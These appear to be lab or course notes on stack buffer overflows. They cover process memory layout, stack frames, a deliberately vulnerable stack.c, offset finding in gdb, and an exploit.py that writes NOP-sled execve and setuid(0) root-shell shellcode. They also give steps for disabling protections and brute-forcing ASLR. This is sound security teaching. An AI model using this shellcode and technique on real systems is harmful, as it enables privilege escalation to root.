Buffer Overflow

a common security flaw
these notes cover stack-based buffer overflows
- overflows can also be exploited on the heap
Goal: exploit a buffer overflow to run injected code
possible countermeasures:
- checking array bounds (program)
- address randomization (OS)
- dropping privileges when a shell is started from a setuid program (shell)

Program memory stack

stack grows downward (from high to low addresses), heap grows upward (from low to high addresses)
variable placement depends on type of variable: global, local, static, initialized etc.
- text segment - executable code of program
- data segment - static and global initialized data
- BSS segment - static and global un-initialized data
- heap - for dynamic memory allocation (malloc, calloc, etc.)
- stack - local variables, data related to function calls etc.

#include <stdlib.h>

int x = 100;        // data segment (initialized global)
int main(){
    int a = 2;      // stack (local)
    float b = 2.5;  // stack (local)
    static int y;   // BSS segment (uninitialized static)

    // ptr itself is on the stack, the array it points to is on the heap
    int *ptr = (int *)malloc(2*sizeof(int));

    ptr[0] = 5;     // heap
    ptr[1] = 6;     // heap
    free(ptr);
    return 0;
}

                 |             |
(high addr)      |-------------|
 a, b, ptr ----> |    stack    |
                 |-------------|
                 |      ↓      |
                 |             |
                 |      ↑      |
                 |-------------|
     array ----> |     heap    |
                 |-------------|
         y ----> |  BSS segmt  |
                 |-------------|         
         x ----> |  Data sgmt  |
                 |-------------|         
                 |  Text sgmt  |
                 |-------------|         
(low addr)       |             |

Stack Frame

stack stores data used for function calls
stack frame has 4 regions
- arguments - values of arguments passed into function; pushed in reverse order
- return address - next instruction after function call
- previous frame pointer - saved frame pointer (ebp) of the calling function
- local variables - compilers may randomize or add extra space for these
we do not know exact addresses
- frame pointer (in ebp register) refers to a fixed location
- points to location of previous frame pointer
- can compute the offset of other stack members from ebp

void f(int a, int b){
  int x;
}
void main(){
  f(1, 2);
}

   |       (high addr)  |             |
   |                    |-------------| ---
   |                    |             |    |
   |                    |             |    |---- main() stack frame
   |                    |-------------| ---|
   |     value of b --> |      2      |    |
   |                    |-------------|    |
   |     value of a --> |      1      |    |
   |                    |-------------|    |
   |    return addr --> |     ptr     |    |---- f() stack frame
   |                    |-------------|    |
   |    prev. frame --> |     ptr     |    |
   |                    |-------------| * -|---- frame pointer!
   |     value of x --> |      x      |    |
   |                    |-------------| ---|
   ↓                    |             |   
 stack 
 grows
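
The offsets from ebp can be sketched as follows for the f(1, 2) frame above. This assumes a 32-bit x86 layout with 4-byte slots; the helper name frame_layout and the sample ebp value are hypothetical, and the slot used for the local variable x is only illustrative, since compilers may place locals differently.

```python
WORD = 4  # bytes per stack slot on 32-bit x86 (assumption)

def frame_layout(ebp):
    """Return the addresses of the members of f(a, b)'s stack frame, relative to ebp."""
    return {
        "b": ebp + 3 * WORD,            # second argument, pushed first
        "a": ebp + 2 * WORD,            # first argument, pushed last
        "return address": ebp + WORD,
        "previous frame pointer": ebp,  # ebp points at this slot
        "x": ebp - WORD,                # illustrative; actual slot is compiler-dependent
    }

layout = frame_layout(0xbfffe000)  # hypothetical ebp value
for name, addr in layout.items():
    print(f"{name:>24}: {addr:#010x}")
```

Arguments and the return address sit at positive offsets from ebp, local variables at negative offsets.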

Buffer overflow steps

overflowing the buffer overwrites the return address in the stack frame
depending on the new value, returning from the function can lead to:
- invalid instructions: location exists but data at location is invalid → program crashes
- non-existing address: if address does not map to any location → program crashes
- access violation: address space is protected → program crashes
- valid address and instruction → attacker's code may execute
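
The overwrite itself can be illustrated with a toy model in Python. This is only a sketch under simplifying assumptions: the frame is a bytearray laid out as buffer, saved ebp, return address, the buffer is 8 bytes, and the names make_frame, toy_strcpy and return_address as well as all addresses are hypothetical.

```python
import struct

BUF_SIZE = 8  # toy buffer size (assumption; real buffers are larger)

def make_frame(saved_ebp, ret_addr):
    """Toy frame from low to high address: buffer | saved ebp | return address."""
    return bytearray(BUF_SIZE) + struct.pack("<II", saved_ebp, ret_addr)

def toy_strcpy(frame, src):
    """Copy src up to its first NUL byte into the frame, without any bounds check."""
    end = src.find(b"\x00")
    data = (src if end == -1 else src[:end]) + b"\x00"  # strcpy also writes the NUL
    frame[0:len(data)] = data

def return_address(frame):
    """Read the 4-byte little-endian return address slot."""
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]

frame = make_frame(saved_ebp=0xbfffeb00, ret_addr=0x08048500)

toy_strcpy(frame, b"hi")                 # fits into the buffer
ret_after_short = return_address(frame)  # return address unchanged

payload = b"A" * (BUF_SIZE + 4) + struct.pack("<I", 0xbfffeb70)
toy_strcpy(frame, payload)               # longer than the buffer
ret_after_long = return_address(frame)   # return address replaced

print(hex(ret_after_short), hex(ret_after_long))
```

The short input leaves the return address alone; the long input fills the buffer, runs over the saved ebp and replaces the return address with a value chosen by whoever supplied the input.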

Example

stack.c

/* This program has a buffer overflow vulnerability. */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int foo(char *str)
{
    char buffer[100];

    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[400];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 300, badfile);
    foo(str);

    printf("Returned Properly\n");
    return 1;
}

Goal: replace stack frame return address with new address that points to malicious code

1. find the offset between the base of the buffer and the return address
2. find the address at which to place the malicious code
3. overwrite the return address with the address of the malicious code

                        3. overwrite                    2. find 
                              ↓                       ↓  address 
 _________________________________________________________________
|     |     |         |               |         |     |           |
| NOP | NOP | ------- |  return addr  | ------- | NOP | Shellcode |
|_____|_____|_________|_______________|_________|_____|___________|

                      ↑ 1. find distance
↑ start of buffer          to here

Distance to return addr

Set breakpoint at foo() to find addresses:

in gdb

set breakpoint at foo by using b foo
call run to start execution
program will break at foo()

# disable countermeasures
$ gcc -z execstack -fno-stack-protector -g -o stack_dbg stack.c

$ touch badfile
$ gdb stack_dbg
....
(gdb) b foo  <-- breakpoint
Breakpoint 1 at 0x8048484a: file stack.c, line 14.
(gdb) run
....
Breakpoint 1, foo (str=0xbfffeb1c "...") at stack.c, line 10.
10 strcpy(buffer, str)

use the gdb p command to print the value of the ebp register and the address of buffer
then compute the distance

(gdb) p $ebp
$1 = (void *) 0xbfffeaf8
(gdb) p &buffer
$2 = (char (*)[100]) 0xbfffea8c
(gdb) p/d 0xbfffeaf8 - 0xbfffea8c
$3 = 108
(gdb) quit

frame pointer (ebp) is at 0xbfffeaf8
therefore return address is at 0xbfffeaf8 + 4
first address we can jump to is at 0xbfffeaf8 + 8

→ put 0xbfffeaf8 + 8 in return address location

the return address sits 4 bytes above ebp, so its offset from the start of the buffer is (ebp - buffer) + 4

→ distance to return address is 108 + 4 = 112 (from buffer's addr 0xbfffea8c).
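
The arithmetic above can be checked with a few lines of Python. The two addresses are the values printed by gdb for ebp and buffer; the variable names are chosen for illustration, and the 4-byte word size assumes a 32-bit build.

```python
WORD = 4                 # size of a stack slot on 32-bit x86 (assumption)

ebp = 0xbfffeaf8         # value printed by `p $ebp`
buffer_addr = 0xbfffea8c # value printed by `p &buffer`

offset_to_ebp = ebp - buffer_addr       # distance from buffer start to saved ebp
offset_to_ret = offset_to_ebp + WORD    # return address sits one word above ebp
first_free_addr = ebp + 2 * WORD        # first address above the return address

print(offset_to_ebp, offset_to_ret, hex(first_free_addr))
```

Note that the addresses seen inside gdb may differ slightly from those of a run outside the debugger, so the offset is the reliable result here, not the absolute addresses.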

Address of malicious code

turn off countermeasures to make this step easier
investigate addresses using gdb → find address of function argument
for better chance of finding it, fill badfile with no-ops, then place the malicious code at the end of the file
- this creates multiple entry points: hitting any no op will eventually get us to malicious code.
- without no-ops need to guess address of malicious code exactly.

prog.c

#include <stdio.h>
void func(int* a1){
  printf(" :: a1's address is 0x%x \n", (unsigned int) &a1);
}
int main(){
  int x = 3;
  func(&x);
  return 1;
}

With address randomization turned off, we can verify that the program stack always starts at the same address

$ sudo sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space=0
$ gcc prog.c -o prog
$ ./prog
  :: a1's address is 0xbffff370 
$ ./prog
  :: a1's address is 0xbffff370

Contents of badfile

        (known)              addr to here:
 -------- 112 --------     ↓ 0xbfffeaf8+8           (•̀ᴗ•́ )و     
|_____________________|_______________________________________
|     |     |         |    |     |         |     |            |
| NOP | NOP | ------- | RT | NOP | ------- | NOP |  bad code  |
|_____|_____|_________|____|_____|_________|_____|____________|
↑                          ↑-- fill with no-op --↑
0xbfffea8c              ↑    
                        ↑                     
                 put return addr here

Constructing badfile

exploit.py

#!/usr/bin/python3
import sys

shellcode= (
    "\x31\xc0"             # xorl    %eax,%eax -- zero w/o writing 0
    "\x50"                 # pushl   %eax
    "\x68""//sh"           # pushl   $0x68732f2f  <-- or "/zsh" 
    "\x68""/bin"           # pushl   $0x6e69622f
    "\x89\xe3"             # movl    %esp,%ebx
    "\x50"                 # pushl   %eax
    "\x53"                 # pushl   %ebx
    "\x89\xe1"             # movl    %esp,%ecx
    "\x99"                 # cdq     <-- same as xor to zero but -1 byte
    "\xb0\x0b"             # movb    $0x0b,%al
    "\xcd\x80"             # int     $0x80
).encode('latin-1')

# Fill the content with NOPs
content = bytearray(0x90 for i in range(300))      

# Put the shellcode at the end
start = 300 - len(shellcode)
content[start:] = shellcode                       

# Put the address at offset 112
# instead of +8 using +120 to account for other data on stack
# try different offsets here if this does not work
ret = 0xbfffeaf8 + 120
content[112:116]  = (ret).to_bytes(4,byteorder='little')  

# Write the content to a file
with open('badfile', 'wb') as f:
  f.write(content)
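
Whether a chosen return address actually hits the NOP sled can be estimated as below. This is a rough sketch, assuming the addresses seen in gdb also hold at run time (they may not, which is why several offsets may need to be tried); the constant and function names are hypothetical, and 24 is the byte length of the shellcode listed above.

```python
BUFFER_ADDR = 0xbfffea8c  # &buffer as seen in gdb (may differ outside gdb)
EBP = 0xbfffeaf8          # $ebp as seen in gdb
RET_OFFSET = 112          # offset of the return address within badfile
PAYLOAD_LEN = 300         # number of bytes written to badfile
SHELLCODE_LEN = 24        # length of the shellcode listed above

def sled_range(buffer_addr):
    """Return (start, end): first NOP after the return address, first shellcode byte."""
    start = buffer_addr + RET_OFFSET + 4
    end = buffer_addr + PAYLOAD_LEN - SHELLCODE_LEN
    return start, end

def lands_in_payload(ret, buffer_addr):
    """True if ret points into the NOP sled or exactly at the start of the shellcode."""
    start, end = sled_range(buffer_addr)
    return start <= ret <= end

start, end = sled_range(BUFFER_ADDR)
print(hex(start), hex(end))
print(lands_in_payload(EBP + 120, BUFFER_ADDR))
```

Under these assumptions any return address between the two printed values works, which is the extra tolerance the NOP sled buys.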

The shellcode contains instructions to run execve("/bin/sh", argv, 0) to gain access to the system

Registers used:

eax = 0x0000000b (11) : system call number of execve()
ebx = address to "/bin/sh"
ecx = address of the argument array.
- argv[0] = the address of "/bin/sh"
- argv[1] = 0 (i.e., no more arguments)
edx = zero (no environment variables are passed)
int 0x80 = invoke execve()
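
How the two pushl constants end up as the string "/bin//sh" in memory can be checked in Python. This is a small sketch relying on x86 being little-endian; the helper name pushed_bytes is hypothetical.

```python
def pushed_bytes(imm32):
    """Bytes that a 32-bit little-endian push of imm32 leaves in memory."""
    return imm32.to_bytes(4, byteorder="little")

first_push = pushed_bytes(0x68732f2f)   # pushed first, ends up at the higher address
second_push = pushed_bytes(0x6e69622f)  # pushed second, ends up at the lower address

# Read from low to high address: the later push comes first.
path_in_memory = second_push + first_push
print(first_push, second_push, path_in_memory)
```

The zero word pushed before the two constants (pushl %eax) sits right above the string and acts as its terminating NUL, and the doubled slash keeps the path at exactly 8 bytes without changing its meaning.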

Overwrite return address

the address written over the return address must not contain a zero byte; otherwise badfile contains a 0, which causes strcpy() to stop copying, e.g.

0xffff188 + 0x78 = 0xffff200 <--- last byte is 0
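
A candidate return address can be checked for zero bytes before it is written to badfile. The sketch below assumes 4-byte little-endian addresses; the helper names has_nul_byte and pick_return_address are hypothetical, and 0xbfffeaf8 is the ebp value from the gdb session.

```python
def has_nul_byte(addr):
    """True if any of the 4 bytes of addr is zero."""
    return 0 in addr.to_bytes(4, byteorder="little")

def pick_return_address(base, offsets):
    """Return the first base + offset that contains no zero byte, or None."""
    for off in offsets:
        if not has_nul_byte(base + off):
            return base + off
    return None

ebp = 0xbfffeaf8
print(has_nul_byte(ebp + 8))    # 0xbfffeb00 ends in a zero byte
print(has_nul_byte(ebp + 120))  # 0xbfffeb70 does not
print(hex(pick_return_address(ebp, range(8, 128, 4))))
```

With this ebp, the first address above the return address (ebp + 8) is itself unusable because its low byte is 0, which is one more reason to pick a larger offset.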

Executing the attack

Compile with countermeasures disabled:

$ gcc -o stack -z execstack -fno-stack-protector stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack

Execute:

$ chmod u+x exploit.py
$ rm badfile
$ ./exploit.py
$ ./stack
# id <-- root shell

Countermeasures

Developer: use safer functions like strncpy(), strncat() and safer dynamic link libraries that check length before copying
OS: Address space randomization (ASLR)
- randomizes the start location of the stack so that addresses change every time the program is loaded into memory
- guessing stack address in memory is difficult
- Difficult to guess %ebp address, and address of malicious code
Compiler: Stack guard
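- compiler places a secret value (canary) on the stack between the local variables and the return address
- the canary is checked before the function returns → "stack smashing" is detected if the value has been modified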
Hardware: Non-executable stack
- NX bit (non-executable) separates data from code and marks certain areas of memory as non-executable
- can be defeated by a return-to-libc attack
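
The stack guard idea can be sketched with a toy model in Python. This is an illustration only, not how a compiler implements it: the frame is a bytearray laid out as buffer, canary, return address, the canary is a fixed made-up value (real stack guards use a random value per run), and all names are hypothetical.

```python
import struct

BUF_SIZE = 8                  # toy buffer size (assumption)
CANARY = b"\x5a\xc3\x91\x0e"  # made-up fixed value; real canaries are random

def make_frame(ret_addr):
    """Toy frame from low to high address: buffer | canary | return address."""
    return bytearray(BUF_SIZE) + CANARY + struct.pack("<I", ret_addr)

def unchecked_copy(frame, data):
    """Write data at the start of the frame without any bounds check."""
    frame[0:len(data)] = data

def canary_intact(frame):
    """The check performed before the function returns."""
    return bytes(frame[BUF_SIZE:BUF_SIZE + len(CANARY)]) == CANARY

safe = make_frame(0x08048500)
unchecked_copy(safe, b"hello")
safe_ok = canary_intact(safe)

smashed = make_frame(0x08048500)
unchecked_copy(smashed, b"A" * (BUF_SIZE + 4) + struct.pack("<I", 0xbfffeb70))
smashed_ok = canary_intact(smashed)

print(safe_ok, smashed_ok)
```

Because the canary lies between the buffer and the return address, a contiguous overflow cannot reach the return address without also changing the canary.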

Defeating ASLR

turn on address randomization

$ sudo sysctl -w kernel.randomize_va_space=2

Compile setuid version of stack.c

$ gcc -o stack -z execstack -fno-stack-protector stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack

Run the vulnerable code in an infinite loop

#!/bin/bash

SECONDS=0
value=0

while [ 1 ]
  do
  value=$(( $value + 1 ))
  duration=$SECONDS
  min=$(($duration / 60))
  sec=$(($duration % 60))
  echo "$min minutes and $sec seconds elapsed."
  echo "The program has been running $value times so far."
  ./stack
done
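
How long such a loop may have to run can be estimated roughly. The sketch below assumes that the stack address has 19 bits of entropy (a figure often quoted for 32-bit Linux, not stated in these notes) and that each run succeeds independently with probability 1/2^19; a NOP sled increases the real success chance. All names are hypothetical.

```python
ENTROPY_BITS = 19  # assumed stack entropy on 32-bit Linux

def expected_attempts(entropy_bits=ENTROPY_BITS):
    """Mean number of runs until the guessed address is right (geometric distribution)."""
    return 2 ** entropy_bits

def success_probability(attempts, entropy_bits=ENTROPY_BITS):
    """Probability of at least one success within the given number of runs."""
    p = 1 / 2 ** entropy_bits
    return 1 - (1 - p) ** attempts

print(expected_attempts())
print(round(success_probability(2 ** 19), 3))
print(round(success_probability(4 * 2 ** 19), 3))
```

Under these assumptions the number of required runs is in the hundreds of thousands, which is feasible for a local program that can be restarted quickly.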

Defeating the shell countermeasure

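Bash and dash drop privileges when they detect that they run inside a setuid process, turning it into a non-setuid process. To avoid this, the shellcode calls setuid(0) before starting the shell, which sets the real user ID to 0: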

shellcode= (
    "\x31\xc0"             # xorl     %eax,%eax
    "\x31\xdb"             # xorl     %ebx,%ebx   <-- ebx = 0 (uid argument)
    "\xb0\xd5"             # movb     $0xd5,%al   <-- eax = 0xd5 (213), setuid()
    "\xcd\x80"             # int      $0x80       <-- invoke setuid(0)
    #---- The code below is the same as the one shown before ---
    "\x31\xc0"             # xorl    %eax,%eax
    "\x50"                 # pushl   %eax
    "\x68""//sh"           # pushl   $0x68732f2f
    "\x68""/bin"           # pushl   $0x6e69622f
    "\x89\xe3"             # movl    %esp,%ebx
    "\x50"                 # pushl   %eax
    "\x53"                 # pushl   %ebx
    "\x89\xe1"             # movl    %esp,%ecx
    "\x99"                 # cdq
    "\xb0\x0b"             # movb    $0x0b,%al
    "\xcd\x80"             # int     $0x80
).encode('latin-1')
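
Since the extended shellcode is 8 bytes longer, its start position in badfile shifts. The sketch below wraps the construction steps of exploit.py in a function so that this is handled automatically; build_payload and its parameters are hypothetical names, and the return address is the gdb-derived guess used earlier.

```python
SETUID_PREFIX = b"\x31\xc0\x31\xdb\xb0\xd5\xcd\x80"  # setuid(0)
EXECVE_PART = (b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
               b"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80")  # execve("/bin//sh", ...)

def build_payload(shellcode, ret, ret_offset=112, total=300):
    """NOP-filled buffer with the shellcode at the end and ret at ret_offset."""
    if b"\x00" in shellcode:
        raise ValueError("shellcode must not contain zero bytes (strcpy stops there)")
    content = bytearray(b"\x90" * total)                 # fill with NOPs
    content[total - len(shellcode):] = shellcode         # shellcode at the end
    content[ret_offset:ret_offset + 4] = ret.to_bytes(4, byteorder="little")
    return bytes(content)

shellcode = SETUID_PREFIX + EXECVE_PART
payload = build_payload(shellcode, ret=0xbfffeaf8 + 120)
print(len(shellcode), len(payload), payload[112:116].hex())
```

Writing payload to badfile in binary mode would then replace the last step of exploit.py.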